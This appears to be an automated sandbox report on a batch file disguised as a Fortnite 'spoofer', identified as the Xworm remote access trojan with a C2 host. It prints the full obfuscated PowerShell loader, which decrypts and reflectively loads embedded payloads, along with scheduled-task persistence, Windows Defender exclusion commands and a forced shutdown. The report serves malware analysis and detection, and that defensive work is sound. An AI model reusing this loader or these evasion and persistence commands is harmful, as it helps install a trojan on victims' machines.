Overview

overview

10

Static

static

1

SpooferFornite.bat

windows11-21h2-x64

Analysis

  • max time kernel
    246s
  • max time network
    247s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23-01-2025 18:40

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    SpooferFornite.bat

  • Size

    289KB

  • MD5

    1776b4ed272a4c874cb62d3827da9330

  • SHA1

    15611ee351e8fdb75b6d65fb5a2e111c3fed6b2e

  • SHA256

    9b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7

  • SHA512

    e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e

  • SSDEEP

    6144:TO/Pb0ZIWr3AuGHdOOJvpW2hZkewDbShSj2+AoACcSc2hJaDeAnul2xojol9r:TO/bTNHdxW2rkewDbc8cH/x4o3r

Score
10/10
xwormexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

C2

IDKTOBEHONESTNIGAS-56344.portmap.io:56344

Attributes
  • Install_directory

    %ProgramData%

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Kills process with taskkill 1 IoCs
    defense_evasion
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2208
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\SpooferFornite.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_896_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_896.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4368
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_896.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4440
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_896.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:800
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('noPxVH3ddu1PqIPnSt7r1xd0OgXVM9X59CLWUoO1zk4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjrdQlHUkjBl27IgF/hgbA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $MKRBP=New-Object System.IO.MemoryStream(,$param_var); $PgIYR=New-Object System.IO.MemoryStream; $kyRBD=New-Object System.IO.Compression.GZipStream($MKRBP, [IO.Compression.CompressionMode]::Decompress); $kyRBD.CopyTo($PgIYR); $kyRBD.Dispose(); $MKRBP.Dispose(); $PgIYR.Dispose(); $PgIYR.ToArray();}function execute_function($param_var,$param2_var){ $WZIdA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $beHJX=$WZIdA.EntryPoint; $beHJX.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_896.bat';$CsLar=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_896.bat').Split([Environment]::NewLine);foreach ($HvFyD in $CsLar) { if ($HvFyD.StartsWith(':: ')) { $zZbDh=$HvFyD.Substring(3); break; }}$payloads_var=[string[]]$zZbDh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Checks processor information in registry
            • Enumerates system info in registry
            • Suspicious behavior: AddClipboardFormatListener
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4948
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4536
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4876
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1964
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\ProgramData\powershell.exe"
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1904
            • C:\Windows\SYSTEM32\taskkill.exe
              taskkill /F /IM explorer.exe
              6⤵
              • Kills process with taskkill
              PID:240
            • C:\Windows\SYSTEM32\shutdown.exe
              shutdown.exe /f /s /t 0
              6⤵
                PID:2668
    • C:\ProgramData\powershell.exe
      C:\ProgramData\powershell.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:3716
    • C:\ProgramData\powershell.exe
      C:\ProgramData\powershell.exe
      1⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:2848
    • C:\Windows\system32\AUDIODG.EXE
      C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004D0
      1⤵
        PID:3148
      • C:\ProgramData\powershell.exe
        C:\ProgramData\powershell.exe
        1⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:4532
      • C:\Windows\system32\LogonUI.exe
        "LogonUI.exe" /flags:0x4 /state0:0xa3952055 /state1:0x41c64e6d
        1⤵
        • Modifies data under HKEY_USERS
        • Suspicious use of SetWindowsHookEx
        PID:3704

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\powershell.exe
        Filesize

        440KB

        MD5

        0e9ccd796e251916133392539572a374

        SHA1

        eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

        SHA256

        c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

        SHA512

        e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        3KB

        MD5

        df472dcddb36aa24247f8c8d8a517bd7

        SHA1

        6f54967355e507294cbc86662a6fbeedac9d7030

        SHA256

        e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

        SHA512

        06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Filesize

        62KB

        MD5

        e566632d8956997225be604d026c9b39

        SHA1

        94a9aade75fffc63ed71404b630eca41d3ce130e

        SHA256

        b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0

        SHA512

        f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        1KB

        MD5

        c81d47c3b95d180e012e8380740c4349

        SHA1

        702eded5bde64ab869985b0934655e18dbdc6a70

        SHA256

        cfaa4c0d9f07288af8d6722f228edf33b0d87a4fde1b468f0c3afb837cd061cc

        SHA512

        982beff2c7b39aa271d26424c51e2e10f0a3ea7e1f7321e37397e7811feb409b39408a6cb22b6dfe271cd9c1048b89f5a80e193b570d18a46b7acc2e542f21f1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
        Filesize

        1KB

        MD5

        13ef30e34b94ea33ab4d9fe62b5c3957

        SHA1

        fc16df86061fd69b1880b425cb5d495c8ba346ba

        SHA256

        e7838f2f4cb769049d9073a31a06242c14df2fbd6f349575cfdc093c8df87ff1

        SHA512

        58200a222466e172879760f2978a30f3c5a2ccb7e696bb664b3f7e020a55c0e580404daac0e6576d7836c6368b557e1fba4732acc957795402cfa3b2e2d7ad53

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        59d37a8c588c83e806678c7fb5d1229f

        SHA1

        4396d68567f30f08e08a269802fe3f4784b88c5b

        SHA256

        c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

        SHA512

        19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        190b28f40c0edd3cc08d0fd3aca4779a

        SHA1

        425b98532b6a18aa2baece47605f1cf6c8cfbd11

        SHA256

        8a2c650430d93841587c726ffff72fb64e02d2da24c9d8df17e835d1124d53ce

        SHA512

        8d1c7a20b324937face0e0c9249d635b3dfcfbad004928de731baf0d72df9ee64fb3f482451d20eb55fa0364311a9806e9d49ae4eafca38d6b58a988f8807110

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_20eh3qyn.z5k.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_896.bat
        Filesize

        289KB

        MD5

        1776b4ed272a4c874cb62d3827da9330

        SHA1

        15611ee351e8fdb75b6d65fb5a2e111c3fed6b2e

        SHA256

        9b4083ac2dee0d90ca305780b1318931af119cccd8e9516dd443f3a5ff3e0af7

        SHA512

        e498841716e88b7ad28b53d33e4a448361abab540642171f9a8fc07f6f4e097d9aff20f4489c2ad49a76b0b94f27cc57a234022fe1c75174af641c72151d613e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\startup_str_896.vbs
        Filesize

        115B

        MD5

        e3516fa0556c66f2688fdb20ca215efa

        SHA1

        75cab0b89b7f62ecc2a44b804b4f120977abcd71

        SHA256

        790d99e90285df45fa2258ba8e4fbe72b3dd9b67670ad1c2a1d7f72bcda37b20

        SHA512

        18903ce89076c61eb58d870ab85fae7ff5d5f45103368928caef05432548f9780cf3ab6b59bd6bc448e6874d2e358951a58e02e2df127c84a093e3f044443462

        Download Submit

      • memory/1156-0-0x00007FFC2A033000-0x00007FFC2A035000-memory.dmp

        Filesize

        8KB

        Download

      • memory/1156-14-0x000002AB24E30000-0x000002AB24E68000-memory.dmp

        Filesize

        224KB

        Download

      • memory/1156-13-0x000002AB24D90000-0x000002AB24D98000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1156-79-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1156-12-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1156-11-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1156-10-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/1156-9-0x000002AB24DA0000-0x000002AB24DC2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/1156-78-0x00007FFC2A033000-0x00007FFC2A035000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3716-97-0x000001B25E120000-0x000001B25E166000-memory.dmp

        Filesize

        280KB

        Download

      • memory/4368-24-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4368-30-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4368-27-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4368-26-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4368-25-0x00007FFC2A030000-0x00007FFC2AAF2000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4948-48-0x000002462BA50000-0x000002462BA66000-memory.dmp

        Filesize

        88KB

        Download

      • memory/4948-98-0x000002462C0E0000-0x000002462C0EC000-memory.dmp

        Filesize

        48KB

        Download

      • memory/4948-100-0x0000024613420000-0x000002461342C000-memory.dmp

        Filesize

        48KB

        Download

      • memory/4948-101-0x000002462D550000-0x000002462DA78000-memory.dmp

        Filesize

        5.2MB

        Download

      • memory/4948-116-0x000002462BA40000-0x000002462BA4A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4948-120-0x000002462C540000-0x000002462C54A000-memory.dmp

        Filesize

        40KB

        Download